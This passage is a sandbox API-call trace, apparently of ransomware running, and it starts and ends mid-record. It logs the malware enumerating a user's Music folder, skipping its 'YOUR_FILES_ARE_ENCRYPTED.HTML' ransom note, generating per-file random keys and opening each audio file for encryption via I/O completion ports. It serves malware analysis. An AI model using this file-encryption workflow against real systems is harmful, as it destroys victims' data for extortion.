param_2="%02X" | out: param_1="51") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="4D") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="A4") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="B5") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="FB") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="12") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="68") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="3B") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="DB") returned 2 [0167.661] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="1B") returned 2 [0167.662] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\5JHGboRpMB Q.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\5JHGboRpMB Q.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\5JHGboRpMB Q.mp3" [0167.662] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.662] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0167.662] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4114f80, ftCreationTime.dwHighDateTime=0x1d7e234, ftLastAccessTime.dwLowDateTime=0x8e5c7140, ftLastAccessTime.dwHighDateTime=0x1d7e74d, ftLastWriteTime.dwLowDateTime=0x8e5c7140, ftLastWriteTime.dwHighDateTime=0x1d7e74d, nFileSizeHigh=0x0, nFileSizeLow=0x12415, dwReserved0=0x0, dwReserved1=0x60, cFileName="do_zPXXY6WZzpCYf02s.wav", cAlternateFileName="DO_ZPX~1.WAV")) returned 1 [0167.662] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\do_zPXXY6WZzpCYf02s.wav") returned 65 [0167.662] lstrcmpW (lpString1="do_zPXXY6WZzpCYf02s.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.662] PathFindExtensionW (pszPath="do_zPXXY6WZzpCYf02s.wav") returned=".wav" [0167.662] lstrlenW (lpString=".wav") returned 4 [0167.662] PathFindExtensionW (pszPath="do_zPXXY6WZzpCYf02s.wav") returned=".wav" [0167.662] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\do_zPXXY6WZzpCYf02s.wav" (normalized: "c:\\users\\5alr3u30d3\\music\\4khlav sb2i\\do_zpxxy6wzzpcyf02s.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0167.663] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=74773) returned 1 [0167.663] GetProcessHeap () returned 0x270000 [0167.663] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0167.666] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="F9") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="84") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="67") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="A0") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="C6") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="DD") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="0B") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="F7") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="DE") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="15") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="56") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="A7") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="FE") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="D4") returned 2 [0167.666] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="0D") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="25") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="E1") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="06") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="C9") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="CC") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="14") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="4B") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="FB") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="35") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="11") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="A0") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="A5") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="50") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="B4") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="17") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="8D") returned 2 [0167.667] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="4C") returned 2 [0167.667] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\do_zPXXY6WZzpCYf02s.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\do_zPXXY6WZzpCYf02s.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\do_zPXXY6WZzpCYf02s.wav" [0167.668] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.668] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0167.668] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90165d00, ftCreationTime.dwHighDateTime=0x1d7dddb, ftLastAccessTime.dwLowDateTime=0xe12759b0, ftLastAccessTime.dwHighDateTime=0x1d7e763, ftLastWriteTime.dwLowDateTime=0xe12759b0, ftLastWriteTime.dwHighDateTime=0x1d7e763, nFileSizeHigh=0x0, nFileSizeLow=0xd0e2, dwReserved0=0x0, dwReserved1=0x60, cFileName="f-TsV8zq0u.mp3", cAlternateFileName="F-TSV8~1.MP3")) returned 1 [0167.668] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\f-TsV8zq0u.mp3") returned 56 [0167.668] lstrcmpW (lpString1="f-TsV8zq0u.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.668] PathFindExtensionW (pszPath="f-TsV8zq0u.mp3") returned=".mp3" [0167.668] lstrlenW (lpString=".mp3") returned 4 [0167.668] PathFindExtensionW (pszPath="f-TsV8zq0u.mp3") returned=".mp3" [0167.668] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\f-TsV8zq0u.mp3" (normalized: "c:\\users\\5alr3u30d3\\music\\4khlav sb2i\\f-tsv8zq0u.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0167.668] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=53474) returned 1 [0167.668] GetProcessHeap () returned 0x270000 [0167.669] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75e0048 [0167.673] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="90") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="0C") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="71") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="7B") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="2E") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="0D") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="59") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="BE") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="8A") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="0D") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="C4") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="AD") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="22") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="30") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="C0") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="BB") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="99") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="BA") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="BE") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="83") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="47") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="95") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="11") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="89") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="89") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="09") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="BD") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="90") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="9A") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="EF") returned 2 [0167.673] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="A2") returned 2 [0167.674] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="47") returned 2 [0167.674] lstrcpyW (in: lpString1=0x75f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\f-TsV8zq0u.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\f-TsV8zq0u.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\f-TsV8zq0u.mp3" [0167.674] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x75e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.674] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75e0048, lpOverlapped=0x75e0048) returned 1 [0167.674] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b471c60, ftCreationTime.dwHighDateTime=0x1d7e3bb, ftLastAccessTime.dwLowDateTime=0x230869c0, ftLastAccessTime.dwHighDateTime=0x1d7e613, ftLastWriteTime.dwLowDateTime=0x230869c0, ftLastWriteTime.dwHighDateTime=0x1d7e613, nFileSizeHigh=0x0, nFileSizeLow=0x11a71, dwReserved0=0x0, dwReserved1=0x60, cFileName="HgGnGttNLJOcZZ62.m4a", cAlternateFileName="HGGNGT~1.M4A")) returned 1 [0167.674] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HgGnGttNLJOcZZ62.m4a") returned 62 [0167.674] lstrcmpW (lpString1="HgGnGttNLJOcZZ62.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.674] PathFindExtensionW (pszPath="HgGnGttNLJOcZZ62.m4a") returned=".m4a" [0167.674] lstrlenW (lpString=".m4a") returned 4 [0167.674] PathFindExtensionW (pszPath="HgGnGttNLJOcZZ62.m4a") returned=".m4a" [0167.674] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.674] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HgGnGttNLJOcZZ62.m4a" (normalized: "c:\\users\\5alr3u30d3\\music\\4khlav sb2i\\hggngttnljoczz62.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0167.675] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=72305) returned 1 [0167.675] GetProcessHeap () returned 0x270000 [0167.675] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76081a0 [0167.677] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="EA") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="93") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="EA") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="9A") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="23") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="92") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="EF") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="14") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="18") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="FC") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="72") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="34") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="6C") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="E1") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="1D") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="DC") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="28") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="CA") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="FD") returned 2 [0167.677] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="46") returned 2 [0167.678] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="F0") returned 2 [0167.678] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="8B") returned 2 [0167.678] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="F8") returned 2 [0167.678] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="D1") returned 2 [0167.678] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="0F") returned 2 [0167.678] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="6A") returned 2 [0167.678] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="DB") returned 2 [0167.678] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="B2") returned 2 [0167.678] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="D3") returned 2 [0167.678] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="7A") returned 2 [0167.678] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="E2") returned 2 [0167.678] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="6D") returned 2 [0167.678] lstrcpyW (in: lpString1=0x7618254, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HgGnGttNLJOcZZ62.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HgGnGttNLJOcZZ62.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HgGnGttNLJOcZZ62.m4a" [0167.678] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x76081a0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.678] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76081a0, lpOverlapped=0x76081a0) returned 1 [0167.678] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff99a0, ftCreationTime.dwHighDateTime=0x1d7da0d, ftLastAccessTime.dwLowDateTime=0xad6546a0, ftLastAccessTime.dwHighDateTime=0x1d7e222, ftLastWriteTime.dwLowDateTime=0xad6546a0, ftLastWriteTime.dwHighDateTime=0x1d7e222, nFileSizeHigh=0x0, nFileSizeLow=0x862b, dwReserved0=0x0, dwReserved1=0x60, cFileName="HIZ9LvZ4anxkVZvGFJ.mp3", cAlternateFileName="HIZ9LV~1.MP3")) returned 1 [0167.679] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HIZ9LvZ4anxkVZvGFJ.mp3") returned 64 [0167.679] lstrcmpW (lpString1="HIZ9LvZ4anxkVZvGFJ.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.679] PathFindExtensionW (pszPath="HIZ9LvZ4anxkVZvGFJ.mp3") returned=".mp3" [0167.679] lstrlenW (lpString=".mp3") returned 4 [0167.679] PathFindExtensionW (pszPath="HIZ9LvZ4anxkVZvGFJ.mp3") returned=".mp3" [0167.679] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.679] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HIZ9LvZ4anxkVZvGFJ.mp3" (normalized: "c:\\users\\5alr3u30d3\\music\\4khlav sb2i\\hiz9lvz4anxkvzvgfj.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0167.679] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=34347) returned 1 [0167.679] GetProcessHeap () returned 0x270000 [0167.679] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0167.684] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="DF") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="27") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="03") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="14") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="37") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="4D") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="BF") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="3B") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="8E") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="89") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="24") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="DD") returned 2 [0167.684] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="94") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="FC") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="5F") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="80") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="67") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="46") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="6B") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="6E") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="0B") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="5E") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="CD") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="D5") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="CC") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="48") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="D7") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="5F") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="24") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="E5") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="0C") returned 2 [0167.685] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="18") returned 2 [0167.686] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HIZ9LvZ4anxkVZvGFJ.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HIZ9LvZ4anxkVZvGFJ.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\HIZ9LvZ4anxkVZvGFJ.mp3" [0167.686] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.686] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0167.686] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1664e6d0, ftCreationTime.dwHighDateTime=0x1d7e2ad, ftLastAccessTime.dwLowDateTime=0x8129db80, ftLastAccessTime.dwHighDateTime=0x1d7e328, ftLastWriteTime.dwLowDateTime=0x8129db80, ftLastWriteTime.dwHighDateTime=0x1d7e328, nFileSizeHigh=0x0, nFileSizeLow=0x1481d, dwReserved0=0x0, dwReserved1=0x60, cFileName="nFrHcwd2OR.m4a", cAlternateFileName="NFRHCW~1.M4A")) returned 1 [0167.686] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\nFrHcwd2OR.m4a") returned 56 [0167.686] lstrcmpW (lpString1="nFrHcwd2OR.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.686] PathFindExtensionW (pszPath="nFrHcwd2OR.m4a") returned=".m4a" [0167.686] lstrlenW (lpString=".m4a") returned 4 [0167.686] PathFindExtensionW (pszPath="nFrHcwd2OR.m4a") returned=".m4a" [0167.686] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.686] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\nFrHcwd2OR.m4a" (normalized: "c:\\users\\5alr3u30d3\\music\\4khlav sb2i\\nfrhcwd2or.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0167.686] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=83997) returned 1 [0167.687] GetProcessHeap () returned 0x270000 [0167.687] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0167.688] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="04") returned 2 [0167.688] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="3D") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="DC") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="DF") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="B1") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="24") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="97") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="3C") returned 2 [0167.689] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="27") returned 2 [0167.689] 